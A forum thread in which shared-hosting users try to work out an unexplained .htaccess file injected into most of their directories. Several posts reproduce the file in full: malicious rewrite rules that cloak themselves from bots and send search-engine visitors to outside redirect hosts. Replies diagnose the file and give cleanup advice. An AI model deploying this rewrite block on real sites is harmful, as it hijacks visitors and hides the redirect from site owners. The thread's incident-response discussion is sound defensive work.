strange .htaccess file

[mikeaag]

hey,

One of my server is producing a 500 internal server error, so im investigating it to see whats wrong.

There is a .htaccess file in the htdocs folder which i dont remember putting there (but i havent used this server in a while).

this is whats in the .htaccess file

# exgocgkctswo
RewriteEngine On
RewriteCond %{REQUEST_METHOD}   ^GET$
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|msn\.|yandex\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|search\.|metacrawler\.|rambler\.|mail\.|dogpile\.|ya\.|\/search\?).*$   [NC]
RewriteCond %{HTTP_REFERER}     !^.*(q\=cache\:).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Diagnostics|DTAAgent|ecto|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|****\sYou|Google).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Mediapartners|Megite|MetaProducts).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(WinHTTP|WinNT4|WordPress|WOW64|WWWeasel|wwwster|yacy|Yahoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$   [NC]
RewriteCond %{HTTP_COOKIE}      !^.*xccgtswgokoe.*$
RewriteCond %{HTTPS}            ^off$
RewriteRule ^(.*)$   http://allinoneprogmon.net/cgi-bin/r.cgi?p=10003&i=8fea6e44&j=300&m=2ffda318012215990379383c2f892cd1&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME}  [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]
# exgocgkctswo

Could someone please explain to me what exactly thats doing? as im confident i didnt write that :(

Thanks in advance

[AnthonySterling]

Do you perchance run Joomla on that server? If I recall, there was an exploit for it which creates this .htaccess

[Cupcakes]

First thing first: DELETE IT. If you don't remember editing a file, remove what's been added in. It's as simple as that.

That being said: Is this your own VPS/server then? Might want to consider better security optimization on it and/or check access logs to see if a user logged in to edit the VPS or if there's a rogue script on your hosting account that adds a shell account to add that htaccess. I can tell right now that it rewrites URLs to an affiliate link.

You can just search http://allinoneprogmon.net/ (this is a link to google and NOT the website itself!) that you're not the only person with this problem either ;).

But yes the biggest culprit: Server is horribly insecure.

[mikeaag]

Thanks for the replies,

Its a shared hosting server, so i dont control it, i just have ftp access.

I do not have joomla on there, its just a testing server, so unless you knew the direct path to a file it would redirect you to my proper site.

it could be that one of the test scripts i have online poses a security flaw, but its highly unlikely that anyone would be able to guess the path to any of the scripts.

I have deleted the file, but im still getting a 500 error :(

i did google the web address, but the links shown didnt really give me much insight into what all the code in the file was :(

I'll get in contact with my hosting people to see if they can tell me more.

if anyone else has any more info on this i would appreciate it

Thanks again :D

[mikeaag]

just to add to whats happening,

I've just gone through every folder on the server, and found that the mystery .htaccess file was all over the server!

it was even in the folder which i dont know the name off. all i know is the folder is not web accessible, its show when i connect via ftp and has "htdocs", "logfiles" and "private" as folders.

I also found the .htaccess file in the logfiles folder as well as maybe 70% of the folders on the server.

Something definitely isnt right here :(

[Cupcakes]

Contac your host then. They're the ones that have lax security and permissions that allowed this to happen to your account.

[Prt Scr]

looks like someones been earning ad revenue while the poor owner has been , well, owned...

[mrmomoman]

It's on an Apache Server I assume? It's just a ascii file that is present for directory or root to control access r/w, etc. I would read up on it a little more before you freak out.

.htcaccess with those commands are to block specific sites and specific referrers or allow :)

They are used all the time. If they are listed in a directory or subdirectory the .htcaccess file overrides the one above it. It's for your security. If you do not understand it then ask the admin about them.

[Cupcakes]

It's on an Apache Server I assume? It's just a ascii file that is present for directory or root to control access r/w, etc. I would read up on it a little more before you freak out.

.htcaccess with those commands are to block specific sites and specific referrers or allow :)

They are used all the time. If they are listed in a directory or subdirectory the .htcaccess file overrides the one above it. It's for your security. If you do not understand it then ask the admin about them.

You're entirely wrong. If you even took one second to look over the .htaccess snippet he included, the entire thing consists of rewrite conditions and a single rewrite rule to a spam affiliate site.

Far from "for your security." Jeez. :angry:

[mrmomoman]

You're entirely wrong. If you even took one second to look over the .htaccess snippet he included, the entire thing consists of rewrite conditions and a single rewrite rule to a spam affiliate site.

Far from "for your security." Jeez. :angry:

Oh really? .htcaccess does nothing for security? I guess my htcaccess that prevents such things is not for my own benefit. I wasn't looking over this .htcaccess snippet - It was a brief post to explain to him what .htcaccess can do. I told him to ask his admin as he obviously didn't put them in there.

Your explanation does nothing for his post. Thank you very little.

[mikeaag]

Thanks for the posts,

Im in email communications with my hosting company, but they seem to be sending me in circles at the moment, which is leading me to think 2 things.

Either there has been a break down in communication as my support ticket is refered to other people, or they are trying to send me in circles long enough so they dont have to deal with me.

If its the latter, then it leads me to believe that there has been a security breach of some kind on my server, which wasnt my fault. coz im pretty sure if it was my fault, they would just tell me.

I'll update here when i know more about it, just in case someone else has this problem.

If anyone knows anything else, or has had this problem before i would be grateful for your insight :D

Thanks again

[Cupcakes]

Thanks for the posts,

Im in email communications with my hosting company, but they seem to be sending me in circles at the moment, which is leading me to think 2 things.

Either there has been a break down in communication as my support ticket is refered to other people, or they are trying to send me in circles long enough so they dont have to deal with me.

If its the latter, then it leads me to believe that there has been a security breach of some kind on my server, which wasnt my fault. coz im pretty sure if it was my fault, they would just tell me.

I'll update here when i know more about it, just in case someone else has this problem.

If anyone knows anything else, or has had this problem before i would be grateful for your insight :D

Thanks again

Mikeaag, have you gone through your entire hosting account and removed every instance of that .htaccess file? I would also go through and upgrade (or just remove) any scripts you're using (or not using) to start with. Then if you've got active email accounts, change all of their passwords.. Same thing with your [active] MySQL databases. Once you get that done, make sure that no other admin accounts were added to any of your CMS (Joomla was what you were using?) and go ahead and change your Admin passwords for those scripts as well. Then go directory-by-directory to look for files that have recently been uploaded that you know you didn't upload. More than likely will be .php extension so that it can execute code to run on your account.

:)

Oh really? .htcaccess does nothing for security? I guess my htcaccess that prevents such things is not for my own benefit. I wasn't looking over this .htcaccess snippet - It was a brief post to explain to him what .htcaccess can do. I told him to ask his admin as he obviously didn't put them in there.

Your explanation does nothing for his post. Thank you very little.

1.) You're taking ~my~ reply to your post out of context. You insinuated to the OP that the instance of .htaccess he had was "for his security" when in fact it was FAR from that. I already helped him prior to replying to you so you don't need to thank me "very little" at all.

2.) If you didn't look over his .htaccess snippet, then you're not doing any good posting to him. You have to read and look over his original post in its entirety. If you had you'd have had more helpful things to say to him rather than a brief posting "explaining" what .htaccess can do for him...

It's on an Apache Server I assume? It's just a ascii file that is present for directory or root to control access r/w, etc. I would read up on it a little more before you freak out.

He's freaking out for good measure. His account has been accessed by a 3rd party with malicious intent. The .htaccess FILES (in every directory in his account) have conditions and a single rewrite rule to a spam affiliate website. That is not an htaccess file "for his security." In fact, not only does it redirect to a spam website but if you read his initial post, it's tossing a ISE500 on his site! Malformed .htaccess will toss up an internal server 500 error. This will render the live site entirely useless until it's resolved. That is also not indicative of "for his security."

.htcaccess with those commands are to block specific sites and specific referrers or allow :)

Here you insinuate (yet again) that his snippet is "okay." It's actually ~not~ okay. There are conditions that are being told to redirect to a spam affiliate website albeit malformed. Remember, this is not blocking anything. Did you see this RewriteEngine On at the beginning of the conditions and single rewrite?

Or perhaps did you see this after all of the conditions?

 RewriteRule ^(.*)$   http://allinoneprogmon.net/cgi-bin/r.cgi?p=10003&i=8fea6e44&j=300&m=2ffda318012215990379383c2f892cd1&h=%{HTTP_HOST}&
u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME}  [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]

They are used all the time. If they are listed in a directory or subdirectory the .htcaccess file overrides the one above it. It's for your security. If you do not understand it then ask the admin about them.

Yes, .htaccess files are used all the time but.. here you need to be specific to the OP. His specific .htaccess is not for his security. However, .htaccess in general isn't just for security purposes.

http://httpd.apache.org/docs/1.3/mod/mod_rewrite.html#RewriteCond

Example:

To rewrite the Homepage of a site according to the ``User-Agent:'' header of the request, you can use the following:

RewriteCond  %{HTTP_USER_AGENT}  ^Mozilla.*
RewriteRule  ^/$                 /homepage.max.html  [L]

RewriteCond  %{HTTP_USER_AGENT}  ^Lynx.*
RewriteRule  ^/$                 /homepage.min.html  [L]

RewriteRule  ^/$                 /homepage.std.html  [L]

Interpretation: If you use Netscape Navigator as your browser (which identifies itself as 'Mozilla'), then you get the max homepage, which includes Frames, etc. If you use the Lynx browser (which is Terminal-based), then you get the min homepage, which contains no images, no tables, etc. If you use any other browser you get the standard homepage.

[ezwip]

# exgocgkctswo

RewriteEngine On

RewriteCond %{REQUEST_METHOD} ^GET$

RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|msn\.|yandex\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|search\.|metacrawler\.|rambler\.|mail\.|dogpile\.|ya\.|\/search\?).*$ [NC]

RewriteCond %{HTTP_REFERER} !^.*(q\=cache\:).*$ [NC]

RewriteCond %{HTTP_USER_AGENT} !^.*(Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$ [NC]

RewriteCond %{HTTP_USER_AGENT} !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$ [NC]

RewriteCond %{HTTP_USER_AGENT} !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$ [NC]

RewriteCond %{HTTP_USER_AGENT} !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$ [NC]

RewriteCond %{HTTP_USER_AGENT} !^.*(Diagnostics|DTAAgent|ecto|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$ [NC]

RewriteCond %{HTTP_USER_AGENT} !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|****\sYou|Google).*$ [NC]

RewriteCond %{HTTP_USER_AGENT} !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$ [NC]

RewriteCond %{HTTP_USER_AGENT} !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$ [NC]

RewriteCond %{HTTP_USER_AGENT} !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$ [NC]

RewriteCond %{HTTP_USER_AGENT} !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$ [NC]

RewriteCond %{HTTP_USER_AGENT} !^.*(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Mediapartners|Megite|MetaProducts).*$ [NC]

RewriteCond %{HTTP_USER_AGENT} !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$ [NC]

RewriteCond %{HTTP_USER_AGENT} !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$ [NC]

RewriteCond %{HTTP_USER_AGENT} !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$ [NC]

RewriteCond %{HTTP_USER_AGENT} !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$ [NC]

RewriteCond %{HTTP_USER_AGENT} !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$ [NC]

RewriteCond %{HTTP_USER_AGENT} !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$ [NC]

RewriteCond %{HTTP_USER_AGENT} !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$ [NC]

RewriteCond %{HTTP_USER_AGENT} !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$ [NC]

RewriteCond %{HTTP_USER_AGENT} !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$ [NC]

RewriteCond %{HTTP_USER_AGENT} !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$ [NC]

RewriteCond %{HTTP_USER_AGENT} !^.*(WinHTTP|WinNT4|WordPress|WOW64|WWWeasel|wwwster|yacy|Yahoo).*$ [NC]

RewriteCond %{HTTP_USER_AGENT} !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$ [NC]

RewriteCond %{HTTP_COOKIE} !^.*xccgtswgokoe.*$

RewriteCond %{HTTPS} ^off$

RewriteRule ^(.*)$ http://checkforsec.com/cgi-bin/r.cgi?p=9004&i=439e8f25&j=305&m=f299e5a650188b64b99088237f69801a&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME} [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]

# exgocgkctswo

Hello, I just found your forum by searching google for what is going on with my server. I also suspect that my host is insecure but I'm not positive. One of the things that has me suspicious is the way they act about it when I call them. For instance, he was quick to say that I was running Joomla when I am not. Then he switched to WordPress. When I mentioned the CMS I am actually running he had no idea yet it is just as popular. I'm using e107 and it is up to date. I'm not going to call out the host as I'm not certain but he straight said on the phone that another guy complained earlier. To me that is suspicious. Have you resolved your problem? This is the third instance first was a few months ago. Now twice in July. It's a ton of fun removing them from every directory isn't it? I'll holla at ya if I find more info.

[mikeaag]

Hello, I just found your forum by searching google for what is going on with my server. I also suspect that my host is insecure but I'm not positive. One of the things that has me suspicious is the way they act about it when I call them. For instance, he was quick to say that I was running Joomla when I am not. Then he switched to WordPress. When I mentioned the CMS I am actually running he had no idea yet it is just as popular. I'm using e107 and it is up to date. I'm not going to call out the host as I'm not certain but he straight said on the phone that another guy complained earlier. To me that is suspicious. Have you resolved your problem? This is the third instance first was a few months ago. Now twice in July. It's a ton of fun removing them from every directory isn't it? I'll holla at ya if I find more info.

Hey thanks for the reply,

I still havent found out how the files got on to the server, but as far as i can see they havent come back.

I dont believe there are any CMS's on my server, and there's even less of a chance of me having e107 on there.

I'll PM you the host im with to see if we are using the same people. i agree in not publicly accusing the hosting company without actual proof.

[Xeon]

Contac your host then. They're the ones that have lax security and permissions that allowed this to happen to your account.

Would be pretty funny if his host was Holdfire, just sayin :whistle:

[mikeaag]

Just an update,

I've heard back from my hosting company, from their 2nd line support and the guy basically told me they didnt know how the file got there and that if it happened again i should contact them before deleting the file.

so they were absolutely no help at all!

[CWSites]

Okay so in response to the first guy that posted about this... I'm a web designer so I have multiple sites all with different setups, scripts, servers, CMS, etc.

I have had this identical problem on 9 of my sites. Some with Wordpress, some with no CMS... Some have special javascripts, some have just basic HTML, it has effected my sites on 4 completely different hosts. I have a very close friendship with one of the web hosts and he told me that there was no Denial of Access logs on any of the sites that were hacked... So whoever got into the FTP of the site knew the password.

I have gone through and cleaned out all of the .htaccess files of the sites and the "hacker" has actually come back and re-hacked the website adding all the files back in. The most recent attack was this morning at 6:54am EST. I've reset my FTP password on all my accounts, and I even had the host completely wipe out the client account and re-install it.

Glad to know I'm not the only one but this is really ****ing me and my clients off that every couple of days their site is down... What's the deal???

This is the code that I get.

# exgocgkctswo
RewriteEngine On
RewriteCond %{REQUEST_METHOD}   ^GET$
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|msn\.|yandex\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|search\.|metacrawler\.|rambler\.|mail\.|dogpile\.|ya\.|\/search\?).*$   [NC]
RewriteCond %{HTTP_REFERER}     !^.*(q\=cache\:).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Diagnostics|DTAAgent|ecto|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|****\sYou|Google).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Mediapartners|Megite|MetaProducts).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(WinHTTP|WinNT4|WordPress|WOW64|WWWeasel|wwwster|yacy|Yahoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$   [NC]
RewriteCond %{HTTP_COOKIE}      !^.*xccgtswgokoe.*$
RewriteCond %{HTTPS}            ^off$
RewriteRule ^(.*)$   http://indanetwall.net/cgi-bin/r.cgi?p=10001&i=53af6b67&j=306&m=ce392a89cc7aa206e28425d0252cda92&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME}  [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]
# exgocgkctswo

[CWSites]

Just got this info from my host... The person that logged in and hacked the site was captured in the log file. I suggest you find out at what time the .htaccess files were changed then have your host look at the log files, see if it's the same IP address that is doing this stuff to you? Maybe we'll get lucky and the SOB is just one person doing it to multiple people. Have your host BLACKLIST any IP addresses that are doing this kind of activity. I'd also ask that you please post the IP address on here so we can compare and see if it's coming from a certain set of IP addresses that we can all blacklist.

Aug  9 06:52:59 alpha pure-ftpd: ([email protected]) [INFO] birding is now logged in 
Aug  9 06:54:16 alpha pure-ftpd: ([email protected]) [NOTICE] /home/birding//public_ftp/.htaccess downloaded  (3411 bytes, 105.30KB/sec) 

[Cupcakes]

You should edit your username from your post. Then ask your host to actually change your username(s) that have been affected.

[mikeaag]

Thanks for your reply CWSites,

Since having this problem it has not reappeared.

If it does i will be sure to pass on the details so we can try and find out who is behind this.

Thanks again

[game_over]

sort of of topic but do any readers know the best way to secure a linux/apache web server to avoid this sort of stuff? maybe some guides?

[uniacidz]

Probably just the russian mafia, nothing to worry about :pinch:

91.212.226.131 IP address location & more:

IP address [?]: 91.212.226.131 [Copy][Whois] [Reverse IP]

IP country code: RU

IP address country: Russian Federation

IP address state: Volgograd

IP address city: Zhirkov

IP address latitude: 48.6458

IP address longitude: 42.9181

ISP of this IP [?]: Artem Zhirkov Alekseevich

Organization: Artem Zhirkov Alekseevich

Host of this IP: [?]: ip-91-212-226-131.server.lu [Whois] [Trace]

Local time in Russian Federation: 2010-08-10 18:25

IP address: 91.212.226.131

This is a: Russian Federation IP address

91.212.226.131 converted to decimal and hex:

IP decimal IP hex

1540678275 5bd4e283

With our IP locator you can track IP addresses, hosts and websites. We probably use the most accurate IP address location database to determine any IP address location. Moreover you will find out the ISP, the Netspeed and more info after the tracing.

[Hornsby]

Hi, I have had the same file in my hosted Apache server it was running Joomla before I removed it, but it does't run anything but htm files.

I removed this files a week or so ago but yesterday it returned I have changed all access passwords to the FTP server.

I hope this does the trick.

Dreadful people those Russians. :angry:

# exgocgkctswo
RewriteEngine On
RewriteCond %{REQUEST_METHOD}   ^GET$
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|msn\.|yandex\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|search\.|metacrawler\.|rambler\.|mail\.|dogpile\.|ya\.|\/search\?).*$   [NC]
RewriteCond %{HTTP_REFERER}     !^.*(q\=cache\:).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Diagnostics|DTAAgent|ecto|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|****\sYou|Google).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Mediapartners|Megite|MetaProducts).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(WinHTTP|WinNT4|WordPress|WOW64|WWWeasel|wwwster|yacy|Yahoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$   [NC]
RewriteCond %{HTTP_COOKIE}      !^.*xccgtswgokoe.*$
RewriteCond %{HTTPS}            ^off$
